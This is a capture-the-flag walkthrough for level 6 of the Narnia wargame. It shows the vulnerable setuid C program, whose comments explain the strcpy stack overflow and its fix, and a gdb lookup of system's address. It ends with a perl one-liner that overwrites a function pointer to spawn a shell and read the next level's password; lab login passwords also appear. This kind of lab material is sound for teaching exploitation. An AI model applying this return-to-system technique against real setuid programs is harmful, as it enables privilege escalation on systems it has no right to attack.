# Narnia wargame: Level 6


# ssh narnia6@narnia.labs.overthewire.org
narnia6@narnia.labs.overthewire.org's password:6e65657a6f6361656e67

narnia6@melissa$ file /narnia/narnia6
/narnia/narnia6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
narnia6@melissa$ cat /narnia/narnia6.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

/*
 * narnia6 challenge program: copies its two command-line arguments into
 * fixed 8-byte stack buffers, then calls a function pointer (initialised
 * to puts) with the first buffer as its argument.
 *
 * Review note: both copies use strcpy() with no length check, so any
 * argument longer than 7 characters writes past the end of its buffer
 * (stack-based buffer overflow, CWE-121). b1, b2 and fp share one stack
 * frame; which neighbour is overwritten depends on the compiler's layout.
 * A corrupted fp changes the target of the indirect call near the end of
 * the function. Rejecting arguments with strlen(argv[n]) >= sizeof b1, or
 * using a bounded copy such as snprintf(b1, sizeof b1, "%s", argv[1]),
 * removes the defect.
 *
 * Exit status: -1 on a wrong argument count or when the pointer filter
 * trips; 1 after the call through fp returns.
 */
int main(int argc, char *argv[]){
        /* Two 8-byte buffers: room for 7 characters plus the NUL terminator. */
        char b1[8], b2[8];
        /* fp starts out pointing at puts, cast to int (*)(char *); i is the loop index. */
        int  (*fp)(char *)=(int(*)(char *))&puts, i;

        /* Exactly two arguments are required; otherwise print usage and quit. */
        if(argc!=3){ printf("%s b1 b2\n", argv[0]); exit(-1); }

        /*
         * Zero every environment string in place. The environ pointer array
         * itself is left intact, so each entry becomes an empty string.
         * NOTE(review): presumably meant to keep attacker-chosen bytes out of
         * the environment area -- confirm intent with the challenge author.
         */
        for(i=0; environ[i] != NULL; i++)
                memset(environ[i], '\0', strlen(environ[i]));
        /*
         * Zero any arguments after the second. argc is 3 at this point, so
         * argv[3] is the terminating NULL and the loop body never executes.
         */
        for(i=3; argv[i] != NULL; i++)
                memset(argv[i], '\0', strlen(argv[i]));

        /* Unbounded copies: nothing limits argv[1]/argv[2] to sizeof b1/b2. */
        strcpy(b1,argv[1]);
        strcpy(b2,argv[2]);
        /*
         * Abort when bits 24-31 of fp are all set (top byte 0xff on a 32-bit
         * target). NOTE(review): this looks like a filter against pointers
         * into the stack region -- confirm. It is a deny-list on one address
         * range only; it does not verify that fp still equals puts, so any
         * other modified value passes.
         */
        if(((unsigned long)fp & 0xff000000) == 0xff000000)
                exit(-1);
        /* Indirect call with b1 as the argument; prints b1 when fp is still puts. */
        fp(b1);

        /* Normal termination reports status 1, not 0. */
        exit(1);
}
narnia6@melissa$ gdb -q /narnia/narnia6
(gdb) run a b
Starting program: /narnia/narnia6 a b
a

Program exited with code 01.
(gdb) break system
Breakpoint 1 at 0xf7eaf260
(gdb) quit
narnia6@melissa$ /narnia/narnia6 `perl -e 'print "a"x8 . "\x60\xf2\xea\xf7"'` `perl -e 'print "a"x8 . "/bin/sh"'`
$ /usr/bin/whoami
narnia7
$ /bin/cat /etc/narnia_pass/narnia7
61686b69617a69706875
